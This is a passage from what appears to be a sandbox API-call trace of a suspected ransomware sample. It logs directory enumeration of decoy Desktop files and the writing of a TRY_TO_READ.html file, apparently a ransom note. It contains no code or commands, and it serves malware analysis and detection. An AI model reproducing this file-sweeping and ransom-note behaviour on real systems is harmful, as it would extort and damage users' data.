	[0099.640] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c848860, ftCreationTime.dwHighDateTime=0x1d4cf56, ftLastAccessTime.dwLowDateTime=0x744371e0, ftLastAccessTime.dwHighDateTime=0x1d4cd4d, ftLastWriteTime.dwLowDateTime=0x744371e0, ftLastWriteTime.dwHighDateTime=0x1d4cd4d, nFileSizeHigh=0x0, nFileSizeLow=0x15740, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eP3CKlE Jn1WX_Ix8H80.jpg", cAlternateFileName="EP3CKL~1.JPG")) returned 1
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.640] GetLastError () returned 0x0
	[0099.640] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa306e3c0, ftCreationTime.dwHighDateTime=0x1d4cd81, ftLastAccessTime.dwLowDateTime=0x32e577b0, ftLastAccessTime.dwHighDateTime=0x1d4d113, ftLastWriteTime.dwLowDateTime=0x32e577b0, ftLastWriteTime.dwHighDateTime=0x1d4d113, nFileSizeHigh=0x0, nFileSizeLow=0x70b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FEhHTJ Mn0_pPid34.swf", cAlternateFileName="FEHHTJ~1.SWF")) returned 1
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.640] GetLastError () returned 0x0
	[0099.640] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ca2f690, ftCreationTime.dwHighDateTime=0x1d4cf13, ftLastAccessTime.dwLowDateTime=0xd3046750, ftLastAccessTime.dwHighDateTime=0x1d4c796, ftLastWriteTime.dwLowDateTime=0xd3046750, ftLastWriteTime.dwHighDateTime=0x1d4c796, nFileSizeHigh=0x0, nFileSizeLow=0x45fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fx2qp9VfVfnX5d-CiwFc.gif", cAlternateFileName="FX2QP9~1.GIF")) returned 1
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.640] GetLastError () returned 0x0
	[0099.640] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63964bc0, ftCreationTime.dwHighDateTime=0x1d4ca22, ftLastAccessTime.dwLowDateTime=0x3b62dc40, ftLastAccessTime.dwHighDateTime=0x1d4ce05, ftLastWriteTime.dwLowDateTime=0x3b62dc40, ftLastWriteTime.dwHighDateTime=0x1d4ce05, nFileSizeHigh=0x0, nFileSizeLow=0x76b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GaWza31SXv7X.doc", cAlternateFileName="GAWZA3~1.DOC")) returned 1
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.640] GetLastError () returned 0x0
	[0099.640] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x397b0da0, ftCreationTime.dwHighDateTime=0x1d4cb8d, ftLastAccessTime.dwLowDateTime=0x85576730, ftLastAccessTime.dwHighDateTime=0x1d4c8c4, ftLastWriteTime.dwLowDateTime=0x85576730, ftLastWriteTime.dwHighDateTime=0x1d4c8c4, nFileSizeHigh=0x0, nFileSizeLow=0x1668f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="giNQiFO2yu.mp4", cAlternateFileName="GINQIF~1.MP4")) returned 1
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.640] GetLastError () returned 0x0
	[0099.640] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9b4bc0, ftCreationTime.dwHighDateTime=0x1d4d373, ftLastAccessTime.dwLowDateTime=0xe3d7cfb0, ftLastAccessTime.dwHighDateTime=0x1d4d2fc, ftLastWriteTime.dwLowDateTime=0xe3d7cfb0, ftLastWriteTime.dwHighDateTime=0x1d4d2fc, nFileSizeHigh=0x0, nFileSizeLow=0xf179, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HhMfPR1c0a2FRe G6vKW.swf", cAlternateFileName="HHMFPR~1.SWF")) returned 1
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.641] GetLastError () returned 0x0
	[0099.641] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe67e150, ftCreationTime.dwHighDateTime=0x1d4cc3c, ftLastAccessTime.dwLowDateTime=0xc7ba8ec0, ftLastAccessTime.dwHighDateTime=0x1d4c5e2, ftLastWriteTime.dwLowDateTime=0xc7ba8ec0, ftLastWriteTime.dwHighDateTime=0x1d4c5e2, nFileSizeHigh=0x0, nFileSizeLow=0xdff7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hMthic_IC4jp-FLB.pdf", cAlternateFileName="HMTHIC~1.PDF")) returned 1
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.641] GetLastError () returned 0x0
	[0099.641] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8859f6d0, ftCreationTime.dwHighDateTime=0x1d4cb4b, ftLastAccessTime.dwLowDateTime=0x4290c3e0, ftLastAccessTime.dwHighDateTime=0x1d4d07d, ftLastWriteTime.dwLowDateTime=0x4290c3e0, ftLastWriteTime.dwHighDateTime=0x1d4d07d, nFileSizeHigh=0x0, nFileSizeLow=0x4125, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InG5T3.bmp", cAlternateFileName="")) returned 1
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.641] GetLastError () returned 0x0
	[0099.641] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed6f9550, ftCreationTime.dwHighDateTime=0x1d4ce77, ftLastAccessTime.dwLowDateTime=0x6de7dc20, ftLastAccessTime.dwHighDateTime=0x1d4c5f8, ftLastWriteTime.dwLowDateTime=0x6de7dc20, ftLastWriteTime.dwHighDateTime=0x1d4c5f8, nFileSizeHigh=0x0, nFileSizeLow=0x1fb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JYnZcsNWalz57I0.bmp", cAlternateFileName="JYNZCS~1.BMP")) returned 1
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.641] GetLastError () returned 0x0
	[0099.641] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9ed2d70, ftCreationTime.dwHighDateTime=0x1d4ceba, ftLastAccessTime.dwLowDateTime=0x61e33bc0, ftLastAccessTime.dwHighDateTime=0x1d4cd1b, ftLastWriteTime.dwLowDateTime=0x61e33bc0, ftLastWriteTime.dwHighDateTime=0x1d4cd1b, nFileSizeHigh=0x0, nFileSizeLow=0xdfcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LCHbfNdkD8Wqz.wav", cAlternateFileName="LCHBFN~1.WAV")) returned 1
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.641] GetLastError () returned 0x0
	[0099.641] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb5f01e0, ftCreationTime.dwHighDateTime=0x1d4d527, ftLastAccessTime.dwLowDateTime=0x44493f90, ftLastAccessTime.dwHighDateTime=0x1d4c8f9, ftLastWriteTime.dwLowDateTime=0x44493f90, ftLastWriteTime.dwHighDateTime=0x1d4c8f9, nFileSizeHigh=0x0, nFileSizeLow=0x2b04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lIZLRTs Pd6.odp", cAlternateFileName="LIZLRT~1.ODP")) returned 1
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.642] GetLastError () returned 0x0
	[0099.642] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b54eb90, ftCreationTime.dwHighDateTime=0x1d4ca32, ftLastAccessTime.dwLowDateTime=0xa15d3950, ftLastAccessTime.dwHighDateTime=0x1d4cb3a, ftLastWriteTime.dwLowDateTime=0xa15d3950, ftLastWriteTime.dwHighDateTime=0x1d4cb3a, nFileSizeHigh=0x0, nFileSizeLow=0x151d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MepeviR2K0DKAD f4icg.ots", cAlternateFileName="MEPEVI~1.OTS")) returned 1
	[0099.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.642] GetLastError () returned 0x0
	[0099.642] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14082f90, ftCreationTime.dwHighDateTime=0x1d4d032, ftLastAccessTime.dwLowDateTime=0x15ab2350, ftLastAccessTime.dwHighDateTime=0x1d4ccd3, ftLastWriteTime.dwLowDateTime=0x15ab2350, ftLastWriteTime.dwHighDateTime=0x1d4ccd3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS0I 9eu8adcjWLh 5Gf", cAlternateFileName="MS0I9E~1")) returned 1
	[0099.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.642] GetLastError () returned 0x0
	[0099.642] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MS0I 9eu8adcjWLh 5Gf\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ms0i 9eu8adcjwlh 5gf\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0099.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbc38 | out: hHeap=0x540000) returned 1
	[0099.642] WriteFile (in: hFile=0x384, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0099.643] WriteFile (in: hFile=0x384, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0099.644] WriteFile (in: hFile=0x384, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0099.644] CloseHandle (hObject=0x384) returned 1
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596400 | out: hHeap=0x540000) returned 1
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589008 | out: hHeap=0x540000) returned 1
	[0099.644] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b2a6af0, ftCreationTime.dwHighDateTime=0x1d4cbdf, ftLastAccessTime.dwLowDateTime=0xf5728cf0, ftLastAccessTime.dwHighDateTime=0x1d4d370, ftLastWriteTime.dwLowDateTime=0xf5728cf0, ftLastWriteTime.dwHighDateTime=0x1d4d370, nFileSizeHigh=0x0, nFileSizeLow=0x8b3a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nmU57lth1.m4a", cAlternateFileName="NMU57L~1.M4A")) returned 1
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.644] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.644] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.644] GetLastError () returned 0x0
	[0099.644] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4514300, ftCreationTime.dwHighDateTime=0x1d4ce83, ftLastAccessTime.dwLowDateTime=0xc43160e0, ftLastAccessTime.dwHighDateTime=0x1d4cf0a, ftLastWriteTime.dwLowDateTime=0xc43160e0, ftLastWriteTime.dwHighDateTime=0x1d4cf0a, nFileSizeHigh=0x0, nFileSizeLow=0x157be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o0j_ZHuh4LGnsKMmBM.jpg", cAlternateFileName="O0J_ZH~1.JPG")) returned 1
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.644] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.644] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.644] GetLastError () returned 0x0
	[0099.645] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239b8c00, ftCreationTime.dwHighDateTime=0x1d4cc30, ftLastAccessTime.dwLowDateTime=0xab7cf730, ftLastAccessTime.dwHighDateTime=0x1d4c703, ftLastWriteTime.dwLowDateTime=0xab7cf730, ftLastWriteTime.dwHighDateTime=0x1d4c703, nFileSizeHigh=0x0, nFileSizeLow=0x155ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ox3FRqoRTn-lM.mp3", cAlternateFileName="OX3FRQ~1.MP3")) returned 1
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.645] GetLastError () returned 0x0
	[0099.645] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c5d5d30, ftCreationTime.dwHighDateTime=0x1d4cadc, ftLastAccessTime.dwLowDateTime=0x91c63da0, ftLastAccessTime.dwHighDateTime=0x1d4ce2f, ftLastWriteTime.dwLowDateTime=0x91c63da0, ftLastWriteTime.dwHighDateTime=0x1d4ce2f, nFileSizeHigh=0x0, nFileSizeLow=0xb87e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P1eL.ots", cAlternateFileName="")) returned 1
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.645] GetLastError () returned 0x0
	[0099.645] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.645] GetLastError () returned 0x0
	[0099.645] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebfb5d10, ftCreationTime.dwHighDateTime=0x1d4ca5f, ftLastAccessTime.dwLowDateTime=0x4b941720, ftLastAccessTime.dwHighDateTime=0x1d4cdb8, ftLastWriteTime.dwLowDateTime=0x4b941720, ftLastWriteTime.dwHighDateTime=0x1d4cdb8, nFileSizeHigh=0x0, nFileSizeLow=0x9436, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ttxl9yoJB3t.mkv", cAlternateFileName="TTXL9Y~1.MKV")) returned 1
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.645] GetLastError () returned 0x0
	[0099.645] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26679a20, ftCreationTime.dwHighDateTime=0x1d4c797, ftLastAccessTime.dwLowDateTime=0x9e67d450, ftLastAccessTime.dwHighDateTime=0x1d4c79b, ftLastWriteTime.dwLowDateTime=0x9e67d450, ftLastWriteTime.dwHighDateTime=0x1d4c79b, nFileSizeHigh=0x0, nFileSizeLow=0xf332, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x6M0U60Brj.xlsx", cAlternateFileName="X6M0U6~1.XLS")) returned 1
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.645] GetLastError () returned 0x0
	[0099.645] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2860fe0, ftCreationTime.dwHighDateTime=0x1d4d2b6, ftLastAccessTime.dwLowDateTime=0xe58c9d80, ftLastAccessTime.dwHighDateTime=0x1d4c678, ftLastWriteTime.dwLowDateTime=0xe58c9d80, ftLastWriteTime.dwHighDateTime=0x1d4c678, nFileSizeHigh=0x0, nFileSizeLow=0x17c43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XnNx.xls", cAlternateFileName="")) returned 1
	[0099.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.646] GetLastError () returned 0x0
	[0099.646] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980a79d0, ftCreationTime.dwHighDateTime=0x1d4d31e, ftLastAccessTime.dwLowDateTime=0x21893700, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0x21893700, ftLastWriteTime.dwHighDateTime=0x1d4c5ff, nFileSizeHigh=0x0, nFileSizeLow=0x65bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YmNdBrM5raQxjMo6.mkv", cAlternateFileName="YMNDBR~1.MKV")) returned 1
	[0099.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.646] GetLastError () returned 0x0
	[0099.646] FindNextFileW (in: hFindFile=0x5da4f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3108c740, ftCreationTime.dwHighDateTime=0x1d4d36a, ftLastAccessTime.dwLowDateTime=0x7e02f890, ftLastAccessTime.dwHighDateTime=0x1d4ca2d, ftLastWriteTime.dwLowDateTime=0x7e02f890, ftLastWriteTime.dwHighDateTime=0x1d4ca2d, nFileSizeHigh=0x0, nFileSizeLow=0x3a78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_bMfn6RwnbmollBO.ppt", cAlternateFileName="_BMFN6~1.PPT")) returned 1
	[0099.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.646] GetLastError () returned 0x0
